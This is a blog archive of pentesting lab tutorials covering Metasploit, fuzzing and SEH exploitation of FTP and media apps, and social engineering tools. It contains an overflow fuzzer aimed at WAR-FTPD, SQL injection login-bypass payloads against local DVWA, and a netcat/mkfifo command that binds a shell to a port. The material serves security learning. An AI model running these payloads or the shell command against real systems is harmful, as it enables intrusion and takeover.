Posts

Showing posts from February, 2012

Auxiliary on Metasploit (2)

Since my last post turned out to be the same as one of his students', this time I try another auxiliary, the tcp portscan. Just select the Metasploit tcp portscan auxiliary and set all the options as shown below.
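
What the tcp portscan auxiliary does under the hood is a plain TCP connect scan: one full three-way handshake per port, reliable but noisy, because every probe lands in the target's logs. The following is an added example, not code from the original post or from Metasploit. It starts a throwaway listener on 127.0.0.1 (a constructed target) so the scan runs offline, and also binds-then-releases a second port to show what a closed port looks like.

```python
import socket
import threading


def tcp_connect_scan(host, ports, timeout=0.5):
    """Return the sorted list of ports on `host` that accept a TCP connection.

    Same check as auxiliary/scanner/portscan/tcp: connect() succeeds only if
    something is listening; a refused or timed-out connect counts as closed.
    """
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return sorted(open_ports)


def start_dummy_listener(host="127.0.0.1"):
    """Constructed target for the demo: a listener on a kernel-chosen free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))          # port 0 = let the kernel pick a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listener closed, stop the thread
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def pick_closed_port(host="127.0.0.1"):
    """Grab a free port and release it immediately, so nothing listens on it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def demo():
    """Scan a small set of ports: the live listener, a known-closed port and its neighbours.

    Returns (open_port, closed_port, ports_found_open).
    """
    srv, open_port = start_dummy_listener()
    closed_port = pick_closed_port()
    try:
        targets = {open_port, closed_port, open_port + 1, closed_port + 1}
        return open_port, closed_port, tcp_connect_scan("127.0.0.1", sorted(targets))
    finally:
        srv.close()


if __name__ == "__main__":
    listening, closed, found = demo()
    print(f"listener on {listening}, closed port {closed} -> open ports found: {found}")
```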

Beef and Metasploit

Here I try to visualize what we can do with BeEF.

Auxiliary on Metasploit

We just discussed how to use auxiliary modules in Metasploit; auxiliaries are one part of the framework. No need to linger long: open a console and type the command msfconsole

Social Engineering and SET

What exactly is social engineering? Social engineering is nothing but a set of techniques for deceiving another human being. The goal is to get something the attacker wants: not only money or property, but also things such as information, power, victory, and more. Social engineering in the IT world cannot be separated from manipulating the humans who interact with the computer, using a combination of techniques such as spying, stealing, lying, distorting facts, and more. Attackers using social engineering usually do not need a set of advanced tools or software that can crack difficult code. What the attack requires is an understanding of the target's psychological condition and, of course, eloquence.

Msfpayload and Msfencode (Update)

Msfpayload is one of the tools included with the Metasploit Framework. It is used to make payloads. First select one of the many payloads included in the core framework, then give the parameters for the payload and the output format you want; so it can be said that this tool generates the custom payload we want. You can take the generated file into an exploit of your own, and it can be written out as C, Ruby, Perl, Java or other languages. msfpayload also has the ability to create executable programs. It is used by attackers who want to get full access to the target machine, and it is also useful for attackers who want to use the Meterpreter payload, and where IDS and forensics are a concern. Examples of its use:

Linux Exploit - Stack Overflow

Meet again; don't ever get bored of me, okay? In this post I will explain how we exploit a stack overflow on Linux. Just open a terminal and type as shown below.

File Sharing Wizard

This time I will demonstrate SEH exploitation on another application, File Sharing Wizard; just download the application here. As in the previous post, I use OllyDbg as the medium for seeing the processes that occur inside it. Before we look for the vulnerability, sniffing with Wireshark is carried out to find the loophole that will become our exploit. I need not explain how to use Wireshark,

BigAnt Server

I'll see you again :) Next is learning about SEH exploitation; what I practice today uses a direct return, just to try it. The application that will be our exploitation target is BigAnt Server. Open OllyDbg on the application and attach the process AntServer. Our next step is to make the application crash, with the following script / fuzzer.

VUPLAYER

For the umpteenth time I will ruin a music player application :) Just download the application here: vuplayer. We try to find any information on this application; it turns out there are features to enter a playlist, enter a URL and so on. We try to load a playlist, with a .pls file that we will create in Perl; just write a script like this

Mini Stream RM-MP3 converter

Yes, this time I will demonstrate how to exploit RM-MP3 Converter. Straight into the discussion: the first thing we do is find an exploit on exploit-db,

WAR-FTPD & Exploits (3)

After exploring more deeply and getting input from friends, it turns out there was a small problem with my payload; for more details, just write the code below. Then run the script, and do the telnet and Python fuzzer steps.

WAR-FTPD & Exploits (2)

The most awaited tutorial: the exploitation of WAR-FTPD. Straight into the discussion: for exploiting this application we use the fuzzing method first. Copy the script below.

    #!/usr/bin/python
    import socket

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = b"\x41" * 1000             # 1000 bytes of 'A' sent as the USER name
    s.connect(('192.168.56.101', 21))   # WAR-FTPD on the victim VM, FTP control port
    data = s.recv(1024)                 # read the banner
    print("sending dummy data to USER.")
    s.send(b'USER ' + buffer + b'\r\n')
    data = s.recv(1024)                 # read the reply to USER
    s.send(b'PASS PASSWORD\r\n')
    s.close()
    print("Okayy..!")

The script above is the weapon we will use later; it is written in Python. Save it with the name fuzzer.py

WAR-FTPD & Exploits (1)

How to install WAR-FTPD? Here I will explain how to install WAR-FTPD, which we will exploit later :) Just follow the steps in the picture:

Register Memory

Registers are memory of very small size with very high-speed access. Registers are used to store the data and instructions currently being processed, while data and instructions waiting to be processed are stored in main memory. Let us look at the following registers. EAX, EBX, ECX and EDX are called the "General Purpose Registers". These are 32-bit registers; if you are cracking a 16-bit program, the registers involved are AX, BX, CX and DX, and these registers can be split up further.
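
To make the splitting concrete: the low 16 bits of EAX are AX, and AX in turn is AH (bits 15..8) and AL (bits 7..0); EBX, ECX and EDX follow the same pattern. This matters when reading a crash in a debugger, because a full 32-bit overwrite shows up as 41414141 while a write to AL or AX leaves the upper bytes alone. The model below is an added example written for this page, not code from the original post; it uses plain bit arithmetic so it runs on any machine, and the sample value 0xDEADBEEF is constructed.

```python
MASK8, MASK16, MASK32 = 0xFF, 0xFFFF, 0xFFFFFFFF


def split_register(e_reg):
    """Return the (X, H, L) views of a 32-bit register, e.g. EAX -> (AX, AH, AL)."""
    e_reg &= MASK32
    x = e_reg & MASK16            # AX is the low word
    return x, (x >> 8) & MASK8, x & MASK8   # AH is the high byte of AX, AL the low byte


def write_l(e_reg, value):
    """Model `mov al, value`: only bits 7..0 change, bits 31..8 are untouched."""
    return (e_reg & ~MASK8 & MASK32) | (value & MASK8)


def write_h(e_reg, value):
    """Model `mov ah, value`: only bits 15..8 change."""
    return (e_reg & ~(MASK8 << 8) & MASK32) | ((value & MASK8) << 8)


def write_x(e_reg, value):
    """Model `mov ax, value`: the low word changes, bits 31..16 stay."""
    return (e_reg & ~MASK16 & MASK32) | (value & MASK16)


def describe(name, e_reg):
    """Format one register the way a debugger pane shows it (hex, most significant first)."""
    x, h, l = split_register(e_reg)
    return f"E{name}X={e_reg:08X}  {name}X={x:04X}  {name}H={h:02X}  {name}L={l:02X}"


if __name__ == "__main__":
    eax = 0xDEADBEEF                          # constructed sample value
    print(describe("A", eax))
    print(describe("A", write_l(eax, 0x41)))  # only AL becomes 41
    print(describe("A", write_x(eax, 0x4141)))  # AX becomes 4141, upper word kept
```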

Explanation of OllyDbg

As in the previous tutorial, OllyDbg is a debugger program that is quite popular among serial-number seekers / crackers :) Let's go straight to the explanation. We try to directly attach the file we will exploit, warftpd :) Attaching is done while the application warftpd is running; to open it directly, open the .exe file itself.

How to Install OllyDbg

OllyDbg is a software tool used to debug an application, typically used to crack serial numbers :) It can be downloaded for free from the official website. The software is only about 1 MB, so it is very light to use. Using OllyDbg is also very easy; there is no need to install it, because the .exe runs straight away. Just move or send OllyDbg into the virtual XP machine, extract the files to a drive, find the program OllyDbg and double-click it.

Fuzzing and Fuzzer

Fuzzing. What the heck is fuzzing? Fuzzing is one of the methods of finding bugs in applications. With the fuzzing method, an attacker tries to send malformed data in the hope that the application will crash or fail in its operation. When an application crashes, the attacker can then analyse the crash and try to exploit the flaw to control the victim's computer.
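
The single-shot fuzzer used against WAR-FTPD elsewhere on this page sends one 1000-byte buffer; the general method steps the length up until something breaks, then narrows the window down to the exact length at which the crash starts, since that offset is what you need before looking at EIP or the SEH chain in the debugger. The block below is an added example, not code from the original posts. The target is a constructed in-process fake (not WAR-FTPD or any real program) that "crashes" by raising an exception once a field exceeds its fixed 512-byte buffer, so it runs offline.

```python
FAKE_BUFFER_SIZE = 512   # constructed: the fake target's fixed-size copy buffer


class Crash(Exception):
    """Stands in for an access violation / unhandled exception in a real target."""


def fake_ftp_user_command(payload):
    """Constructed target: a USER handler that overflows past FAKE_BUFFER_SIZE bytes."""
    if len(payload) > FAKE_BUFFER_SIZE:
        raise Crash(f"overflow: {len(payload)} bytes into {FAKE_BUFFER_SIZE}-byte buffer")
    return "331 Password required"


def build_fuzz_cases(start=100, step=200, count=30):
    """Buffers of 'A' whose length grows from `start` by `step`, `count` times."""
    return [b"A" * (start + i * step) for i in range(count)]


def fuzz(target, cases):
    """Feed each case to `target`; return (first_crashing_length, reply_log).

    Stops at the first crash, the way a network fuzzer stops when the service
    no longer answers. first_crashing_length is None if every case was handled.
    """
    log = []
    for case in cases:
        try:
            reply = target(case)
        except Crash as exc:
            log.append((len(case), f"CRASH: {exc}"))
            return len(case), log
        log.append((len(case), reply))
    return None, log


def narrow_down(target, good_len, bad_len):
    """Binary-search the smallest crashing length between a surviving and a crashing case."""
    while bad_len - good_len > 1:
        mid = (good_len + bad_len) // 2
        try:
            target(b"A" * mid)
            good_len = mid
        except Crash:
            bad_len = mid
    return bad_len


if __name__ == "__main__":
    crash_len, log = fuzz(fake_ftp_user_command, build_fuzz_cases())
    for length, reply in log:
        print(f"{length:5d} bytes -> {reply}")
    if crash_len is not None:
        exact = narrow_down(fake_ftp_user_command, crash_len - 200, crash_len)
        print(f"smallest crashing length: {exact}")
```

With the defaults the loop survives 100, 300 and 500 bytes and crashes at 700; narrowing between 500 and 700 returns 513, the first length that overruns the 512-byte buffer.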

Introduction TOR Project & Proxychains

The Tor Project. Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all over the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. Tor works with many existing applications, including web browsers, instant messaging clients, remote login, and other applications based on the TCP protocol. Tor is free software and an open network that helps you defend against a form of network surveillance, known as traffic analysis, that threatens personal freedom and privacy, confidential business activities and relationships, and state security.

Introduction Maltego

What is Maltego? Maltego is a tool for OSINT (Open Source Intelligence Gathering). OSINT is a method of searching for information that is available to the public, then analysing it and using it for certain purposes. Maltego is also an open-source intelligence and forensics application. It allows mining and gathering information and presenting that information in a meaningful way.

Bypass fbip

Almost an hour of work just for this bypass, and I found it too: just enter the URL http://127.0.0.1/fbip/ and fill in the username with the query: 'Or 0 = 0 #

SQL Injection dvwa

Still in the spirit of course, this time we will try the SQL injection technique; the target itself is http://127.0.0.1/dvwa. We first try with the standard query ' or'1 = 1
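
Both the fbip bypass above (' Or 0 = 0 #) and this DVWA query (' or '1'='1) work for the same reason: the application glues the input into the SQL string, so a quote in the input ends the string literal and the rest becomes SQL. The block below is an added example for this page, not code from the original posts or from DVWA; it uses an in-memory SQLite database with a constructed users table so it runs offline. One caveat a practitioner should know: SQLite has no # comment syntax (that form is MySQL-only), so the comment-based payload here uses -- to show the same idea.

```python
import sqlite3


def make_db():
    """Constructed sample data: two users in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The DVWA-style bug: user input concatenated straight into the SQL text."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """The fix: values travel separately from the SQL, so quotes never become syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    # Tautology in the password field. The WHERE clause becomes
    #   username = 'admin' AND password = '' or '1'='1' ORDER BY id
    # and AND binds tighter than OR, so every row matches.
    print(login_vulnerable(conn, "admin", "' or '1'='1"))
    # The fbip idea: terminate the string, add a true condition, comment out
    # the rest of the statement (-- here, # on MySQL).
    print(login_vulnerable(conn, "' or 0=0 --", "anything"))
    # Same payload against the parameterized query matches nothing.
    print(login_parameterized(conn, "admin", "' or '1'='1"))
```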

Google Hacking

Google hacking occurs when someone adds one or more operators to a Google search to find a specific string of text in the search results; this way one can find an address or anything else more precisely. How to check for Google hacking vulnerabilities: the easiest way to check whether your web site and applications have vulnerabilities that hackers can find through Google is to use a web vulnerability scanner. A web vulnerability scanner scans your entire web site and automatically checks for pages identified by Google hacking queries. (Note: your web vulnerability scanner should be able to launch Google hack queries.)

mkfifo?

Following on from yesterday's post, I will discuss mkfifo. This is needed because on Ubuntu the -e parameter of nc does not work, which is caused by the nc version installed (the OpenBSD build rather than the traditional one, as noted in the earlier nc post). Just open a terminal on the Ubuntu machine from before and create a named pipe with mkfifo called test/oye. Then execute it with the command: sh test/oye | nc -l 1000 > test/oye
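
Why the FIFO is needed: a pipe only carries data one way, so `sh test/oye | nc -l 1000 > test/oye` uses the pipe for the shell's output (into nc, out over the wire) and the FIFO for the return path (what nc receives is written into test/oye, which sh reads as its script). That loop is what gives a remote shell without -e. The block below is an added example, not from the original post: Python plays the remote peer in place of nc, so the same plumbing runs locally with no network.

```python
import os
import subprocess
import tempfile


def fifo_shell_roundtrip(commands, timeout=10):
    """Run `commands` through `sh <fifo>` and return the shell's combined output.

    Mirrors the post's wiring: sh takes its script from the FIFO, its stdout
    and stderr flow back to the peer (here: this process, in nc's place), and
    the peer writes commands into the FIFO (nc's stdout in the post).
    """
    workdir = tempfile.mkdtemp()
    fifo = os.path.join(workdir, "oye")
    os.mkfifo(fifo)                                   # the `mkfifo test/oye` step
    try:
        sh = subprocess.Popen(["sh", fifo], stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT)
        # open() for writing blocks until sh has opened the FIFO for reading,
        # exactly like the `> test/oye` redirection in the post.
        with open(fifo, "w") as peer_out:
            peer_out.write("\n".join(commands) + "\nexit\n")
        out, _ = sh.communicate(timeout=timeout)      # EOF once sh exits
        return out.decode()
    finally:
        os.remove(fifo)
        os.rmdir(workdir)


if __name__ == "__main__":
    print(fifo_shell_roundtrip(["echo hello from the fifo shell", "pwd"]), end="")
```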

What is Shodan?

Shodan is a search engine that gives information about the services running on every device connected to the internet, whether a router, server or computer with a public IP address. There we can get the various pieces of information we need; here we will try to find information about: http://www.state.gov/

Update NC

This time I want to update my earlier blog post about nc. After hearing the explanation about nc, it turns out the nc on Ubuntu is the OpenBSD one, so that will not work; we will discuss the OpenBSD nc later :) For that we send nc to the Ubuntu computer. I will try to apply in this post what has been described. Just open a terminal on the target computer; here I use Ubuntu as the target. On BackTrack open a terminal, then look for where nc is by typing the command: whereis nc